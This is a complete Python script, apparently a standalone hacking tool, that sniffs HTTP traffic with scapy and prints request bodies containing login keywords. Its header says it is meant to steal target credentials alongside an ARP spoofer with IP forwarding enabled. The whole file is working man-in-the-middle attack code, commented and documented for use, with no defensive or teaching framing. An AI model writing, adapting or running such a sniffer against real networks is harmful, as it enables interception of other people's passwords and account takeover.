#!/usr/bin/python3
# THIS SCRIPT TRIES TO GET TARGET CREDENTIALS
# FROM HTTP WEBSITES RUN AT THE TARGET END
# NOTE:-
# ARPSPOOFER SCRIPT MUST BE RUNNING ALONGSIDE THIS SCRIPT
# AND IP FORWARDING MUST BE ENABLED IN ORDER FOR
# THIS SCRIPT TO WORK PROPERLY
from scapy.all import *
from scapy_http import http
import socket as sc
from struct import *
import sys
from termcolor import colored # use colored text output on the terminal
import optparse as op
# Substrings searched for in a request body. The `in` test that consumes this
# list is case-sensitive, which is why both capitalisations are listed.
words = [
    "user",
    "password",
    "User",
    "Password",
    "username",
    "Username",
    "Login",
    "pass",
    "Pass",
    "uid",
]
def Sniff(interface):
    """Capture on *interface* and pass each packet to ``process_packets``.

    Args:
        interface: Name of the network interface handed to scapy's ``sniff``.
    """
    capture_options = {
        "iface": interface,
        # Packets are handled by the callback only; scapy keeps no copy of them.
        "store": False,
        "prn": process_packets,
    }
    sniff(**capture_options)
def process_packets(pkt):
    """Report the URL of an HTTP request and print its body on a keyword match.

    Only packets that carry an ``http.HTTPRequest`` layer are looked at, i.e.
    requests that crossed the wire as plain HTTP; everything else is ignored.

    Args:
        pkt: The captured packet passed in by scapy's ``sniff`` callback.
    """
    if not pkt.haslayer(http.HTTPRequest):
        return

    request = pkt[http.HTTPRequest]
    url = request.Host + request.Path  # host header followed by the request path
    print("[!] Activity detected at : " + url.decode())

    # A Raw layer holds the request body, which is where submitted form fields appear.
    if not pkt.haslayer(Raw):
        return

    load = pkt[Raw].load
    # str() on the payload gives its printable representation; the keyword
    # search runs against that text, not against the decoded body.
    body_text = str(load)
    if any(w in body_text for w in words):
        # NOTE(review): decode() uses the default codec, so a body that is not
        # valid UTF-8 raises UnicodeDecodeError at this point.
        print(colored("[+] Potential Credentials found:-\n" + load.decode(), "green"))
def main():
    """Parse the ``-i`` option and run the capture until Ctrl-C.

    Prints the usage string and exits when no interface is given.
    """
    usage = "Usage: " + sys.argv[0] + " -i INTERFACE_NAME "
    parser = op.OptionParser(usage)
    parser.add_option("-i", dest="interface", type="string", help="Interface to listen on")
    opts, _positional = parser.parse_args()

    # Without an interface there is nothing to listen on.
    if opts.interface is None:
        print(parser.usage)
        quit()

    try:
        print("[!] Starting the HTTP Credential Sniffer!")
        Sniff(opts.interface)
    except KeyboardInterrupt:
        # Ctrl-C is the expected way to stop the capture.
        print("[!] Stopping the HTTP Credential Sniffer!")
        quit()
# There is no __name__ guard, so this runs on import as well as on direct execution.
main()